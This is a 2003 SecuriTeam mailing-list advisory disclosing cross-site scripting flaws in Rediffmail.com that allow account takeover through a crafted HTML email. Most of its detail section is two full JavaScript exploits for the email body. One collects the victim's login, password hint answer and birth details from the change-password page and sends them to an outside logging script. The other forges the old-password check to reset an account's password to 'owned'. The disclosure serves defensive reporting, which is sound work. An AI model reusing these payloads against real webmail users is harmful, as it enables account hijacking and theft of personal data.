[NEWS] Serious Vulnerabilities Found in Rediffmail.com Web Mail Service (CSS)
From: SecuriTeam (support_at_securiteam.com)
Date: 07/07/03
- Previous message: SecuriTeam: "[NT] VPASP SQL Injection Vulnerability"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 7 Jul 2003 19:32:34 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
Beyond Security in Canada
Toronto-based Sunrays Technologies is now Beyond Security's representative in Canada.
We welcome ISPs, system integrators and IT systems resellers
to promote the most advanced vulnerability assessment solutions today.
Contact us at 416-482-0038 or at canadasales@beyondsecurity.com
- - - - - - - - -
Serious Vulnerabilities Found in Rediffmail.com Web Mail Service (CSS)
------------------------------------------------------------------------
SUMMARY
<http://www.rediff.com> Rediff.com "a premier portal in India has a large
user base", has been found to not properly filter out HTML and JavaScript
code from emails it displays. This vulnerability would allow attackers to
gain access to any user account, by sending them a specially crafted
email.
DETAILS
changepass.cgi Exploitation (Requires Cross-Frame Vulnerability):
As the page changepass.cgi (The interface that allows changing of the
user's password) requires a valid session id, a user must be first logged
on to the system. In addition the code (our malicious code) has to be
executed in the same domain as the changepass.cgi (login.rediff.com) is,
in order to control its password changing process.
Both of these is possible by sending a specially crafted email to a
rediff.com user, this is due to the fact the service does not properly
filter out HTML and JavaScript tags.
Exploit:
The script should be placed within the < BODY> tags of an HTML message.
< SCRIPT>
var sessionid, login, ifs, ife, link, version;
var hlc=0;
function f()
{
window.external.NavigateAndFind("javascript:var
user,hqa,newlink,month,day,year,city,imonth,iday,iyear;user=document.change_pass.login.value; hqa=document.change_pass.hinta.value; city=document.change_pass.citypw.value; imonth=document.change_pass.month.selectedIndex; iday=document.change_pass.day.selectedIndex; iyear=document.change_pass.year.selectedIndex; month=document.change_pass.month.options[imonth].value; day=document.change_pass.day.options[iday].value; year=document.change_pass.year.options[iyear].value; newlink = 'http://www.server.com/cgi-bin/logparam.pl?login='+user+'&hqa='+hqa+'&month='+month+'&day='+day+'&year='+year+'&city='+city; document.location=newlink;","ll","myFrame");
}
function middleString(fullString, startString, endString)
{
if (fullString.indexOf(startString) == -1)
{
return "";
}
else
{
var sub =
fullString.substring(fullString.indexOf(startString)+startString.length,
fullString.length);
if (sub.indexOf(endString) == -1)
{
return sub;
}
else
{
return (sub.substring(0, sub.indexOf(endString)));
}
}
}
function handleLoad()
{
var ifc, user, hqa, newlink, month, day, year, city, country;
var imonth,iday,iyear;
var oDoc=document.getElementById("myFrame").Document;
if(hlc!=0)
{
return;
}
hlc = hlc + 1;
user = oDoc.change_pass.login.value;
hqa = oDoc.change_pass.hinta.value;
city = oDoc.change_pass.citypw.value;
imonth = oDoc.change_pass.month.selectedIndex;
iday = oDoc.change_pass.day.selectedIndex;
iyear = oDoc.change_pass.year.selectedIndex;
month = oDoc.change_pass.month.options[imonth].value;
day = oDoc.change_pass.day.options[iday].value;
year = oDoc.change_pass.year.options[iyear].value;
newlink =
"http://www.server.com/cgi-bin/logparam.pl?login="+user+"&hqa="+hqa+"&month="+month+"&day="+day+"&year="+year+"&city="+city;
window.frames['myFrame'].location = newlink;
}
version = 0;
if(navigator.appVersion.indexOf("MSIE")!=-1)
{
temp=navigator.appVersion.split("MSIE");
version=parseFloat(temp[1]);
}
login = middleString(document.body.innerHTML, "login=", "&session_id=");
sessionid = middleString(document.body.innerHTML, "&session_id=",
"&function_name=");
ifs =
unescape('%3Ciframe%20id%3D%22myFrame%22%20name%3D%22myFrame%22%20style%3D%22width%3A0px%3B%20height%3A0px%3B%20border%3A%200px%22%20src%3D%22');
if(version>=5.5)
{
ife = unescape('%22%20onLoad%3D%22handleLoad%28%29%22%3E%3C/iframe%3E');
}
else
{
ife = unescape('%22%3E%3C/iframe%3E');
}
link =
'http://login.rediff.com/cgi-bin/gold/changepass.cgi?login='+login+'&session_id='+sessionid+'&FormName=show_change_pass';
document.write(ifs+link+ife);
if(version<5.5)
{
setTimeout("f()",5000);
}
</SCRIPT>
changepass.cgi Exploitation (Does Not Require a Cross-Frame
Vulnerability):
The vulnerability lies in the way Rediff.com checks for the 'Old Password'
parameter, this parameter is used in order to change the password to a new
one.
An analysis of the 'change password' page will reveal that the variable
'oldpassdb' (hidden variable) contains the encoded/encrypted form of the
old password, this variable is used by Rediff.com to verify whether the
password entered by the user is valid or not (compared with the value
provided by the user).
As we can control both values, the user provided passwords, and the
'oldpassdb' value, we can effectively reset any user's password to
whatever password we want to, but a perquisite exists, a valid 'oldpassdb'
(system valid, not user valid, i.e. the user doesn't verify whether the
system generated this oldpassdb value, or whether the user has generated a
valid one) has to be provided.
This has proven to be easy as an analysis of the 'oldpassdb' value for
different accounts revealed that the 1st two letters of a Rediff id and
some characters of the 'Old Password', form the 'oldpassdb' value.
For example, a Rediff.com account with the following user ids:
saurav23@rediffmail.com
saudi_arabia_2k3@rediffmail.com
And the same password, will have the same 'oldpassdb' value.
The rest is done via a JavaScript that is executed upon the user's opening
of the email.
Exploit:
The code given below must be placed between < BODY> tags of the HTML mail
that is mailed to the victim, the code given is for any Rediff.com
account, which starts with the letters 'sa'.
< SCRIPT>
var newpass="owned";
var op_dec="aaaa";
var op_enc="sa1a7AwhYV8SQ";
function middleString(fullString, startString, endString)
{
if (fullString.indexOf(startString) == -1)
{
return "";
}
else
{
var sub =
fullString.substring(fullString.indexOf(startString)+startString.length,
fullString.length);
if (sub.indexOf(endString) == -1)
{
return sub;
}
else
{
return (sub.substring(0, sub.indexOf(endString)));
}
}
}
var login = middleString(document.body.innerHTML, "login=",
"&session_id=");
var sessionid = middleString(document.body.innerHTML, "&session_id=",
"&function_name=");
var link = "http://login.rediff.com/cgi-bin/gold/changepass.cgi?login="+
login+"&session_id="+sessionid+"&oldpassdb="+
op_enc+"&FormName=change_pass&oldpasswd="+
op_dec+"&passwd="+newpass+"&passwd1="+
newpass+"&hintq=What+is+the+name+of+your+first+school%3F&hintq1=&hinta=qwerty&month=1&day=01&year=1983&citypw=abc";
document.write('<img src="'+link+'" height=0 width=0>');
</SCRIPT>
ADDITIONAL INFORMATION
The information has been provided by <mailto:viper31337@yahoo.co.in>
Viper.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[NT] VPASP SQL Injection Vulnerability"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
